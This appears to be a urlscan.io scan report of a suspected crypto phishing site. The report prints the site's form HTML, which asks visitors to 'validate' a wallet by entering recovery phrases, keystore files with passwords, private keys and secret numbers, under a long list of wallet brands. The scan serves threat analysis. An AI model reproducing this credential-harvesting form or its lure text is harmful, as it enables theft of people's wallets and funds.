falcontrading.xyz Open in urlscan Pro
2a02:4780:3f:1801:0:3703:2acc:3  Public Scan

Submitted URL: http://falcontrading.xyz/
Effective URL: https://falcontrading.xyz/
Submission Tags: suspect
Submission: On October 22 via api from BR — Scanned from US

Form analysis 1 forms found in the DOM

POST

<form action="" method="post" enctype="multipart/form-data" id="form">
  <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">
    <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900" style="display: flex; flex-direction: row;"> <img src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" style="margin-right: 20px; height: 40px; width: 40px"
        id="myImg"><span>Import your <span id="walletname">Metamask</span> wallet</span>
    </h3>
    <div class="mt-2">
      <div class="mt-10">
        <input type="hidden" name="form-name" value="my-form">
        <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
          <div id="phrase" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Phrase </div>
          <span id="guideDisplay" style="display: none;">
            <div id="keystore" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Keystore JSON </div>
            <div id="private" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Private Key </div>
          </span>
          <span id="guideDisplay2" style="display: none;">
            <div id="family" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Family Seed </div>
            <div id="secret" class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer"> Secret Numbers </div>
          </span>
        </div>
        <div id="first" class="acc-body active">
          <div class="flex flex-col">
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative" data-children-count="1">
              <textarea id="phraseinput" cols="30" rows="4" placeholder="Enter your recovery phrase" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
                name="phrase" required=""></textarea>
              <p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words separated by single spaces </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="btn btn-primary flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
              <span class="mr-2 uppercase">Validate</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z"></path>
                </svg>
              </span>
            </button>
          </div>
          <!-- Successfully Submitted page-->
          <div style="display:none" class="thankyou_message">
            <p class="successful">Phrase Successfully Validated, goto Keystore JSON</p>
          </div>
        </div>
        <div id="second" class="acc-body bg-grey-600">
          <div class="flex flex-col">
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative">
              <textarea cols="30" rows="4" placeholder="Enter your Keystore JSON" id="keystoreval" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
                name="keystore" required=""></textarea>
            </div>
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative" data-children-count="1">
              <input type="text" name="password" placeholder="Wallet password" id="keystorepass" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <p class="text-xs text-grey-300 mt-6"> Several lines of text beginning with "{...}" plus the password you used to encrypt it. </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
              <span class="mr-2
                                             uppercase">Validate</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                </svg>
              </span>
            </button>
          </div>
          <!-- Successfully Submitted page-->
          <div style="display:none" class="thankyou_message">
            <p class="successful">Keystore JSON Successfully Validated, goto Keystore JSON</p>
          </div>
        </div>
        <div id="third" class="acc-body bg-grey-600">
          <div class="flex flex-col">
            <div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Metamask"></div>
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative" data-children-count="1">
              <input type="text" placeholder="Enter your Private Key" name="key" id="privatekeyval" class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <p class="text-xs text-grey-300 mt-6"> Typically 12 (sometimes 24) words seperated by a single space. </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
              <span class="mr-2
                                             uppercase">Validate</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                </svg>
              </span>
            </button>
          </div>
        </div>
        <div id="fourth" class="acc-body bg-grey-600">
          <div class="flex flex-col">
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative">
              <textarea cols="30" rows="4" placeholder="" class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400" id="familyseed" required=""></textarea>
              <p class="text-xs text-grey-300 mt-6"> Looks like sXXX1234XXX... </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
              <span class="mr-2
                                             uppercase">Validate</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                </svg>
              </span>
            </button>
          </div>
        </div>
        <div id="fiveth" class="acc-body bg-grey-600">
          <div class="flex flex-col">
            <div class="relative"><input type="hidden" name="wallet_id" required="required" placeholder="Wallet ID" id="wallet_id" value="Metamask"></div>
          </div>
          <div class="flex flex-col mb-6">
            <div class="relative">
              <input type="text" required="required" placeholder="Secret numbers of row A" name="privatekey1" minlength="6" maxlength="6" id="privatekey1"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row B" name="privatekey2" minlength="6" maxlength="6" id="privatekey2"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row C" name="privatekey3" minlength="6" maxlength="6" id="privatekey3"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row D" name="privatekey4" minlength="6" maxlength="6" id="privatekey4"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row E" name="privatekey5" minlength="6" maxlength="6" id="privatekey5"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row F" name="privatekey6" minlength="6" maxlength="6" id="privatekey6"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row G" name="privatekey7" minlength="6" maxlength="6" id="privatekey7"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <input type="text" required="required" placeholder="Secret numbers of row H" name="privatekey8" minlength="6" maxlength="6" id="privatekey8"
                class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
              <p class="text-xs text-grey-300 mt-6"> Typically 8 rows of 6 digits. </p>
            </div>
          </div>
          <div class="flex w-full">
            <button type="submit" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
              <span class="mr-2
                                             uppercase">Validate</span>
              <span>
                <svg fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" viewBox="0 0 24 24" stroke="currentColor" class="h-6 w-6">
                  <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                </svg>
              </span>
            </button>
          </div>
        </div>
      </div>
    </div>
  </div>
</form>

Text Content

Back
Initializing...
Connect Manually
Metamask
Easy-to-use browser extension.



IMPORT YOUR METAMASK WALLET

Phrase
Keystore JSON
Private Key
Family Seed
Secret Numbers

Typically 12 (sometimes 24) words separated by single spaces

Validate

Phrase Successfully Validated, goto Keystore JSON

Several lines of text beginning with "{...}" plus the password you used to
encrypt it.

Validate

Keystore JSON Successfully Validated, goto Keystore JSON

Typically 12 (sometimes 24) words seperated by a single space.

Validate

Looks like sXXX1234XXX...

Validate

Typically 8 rows of 6 digits.

Validate
Cancel

CONNECT WALLET

bc1qjewx9e2g5ps95tc39mwlxr0cmnwa0cys4nq95jt


Metamask


Trust


Coinbase


Xumm


Cardano


Daedalus


Yoroi


CCVault


Gero


Nami


Solana


Phantom


Solflare


Sollet


Solong


Exodus


Avalanche


Velas


crypto.com


Blockchain


Binance Smart Chain


Safepal


Argent


Fortmatic


Aktionariat


Keyring Pro


BitKeep


SparkPoint


OwnBit


Infinty Wallet


Wallet.io


Infinito


Torus


Nash


BitPay


imTOken


Other Wallet

Navigated to Wallets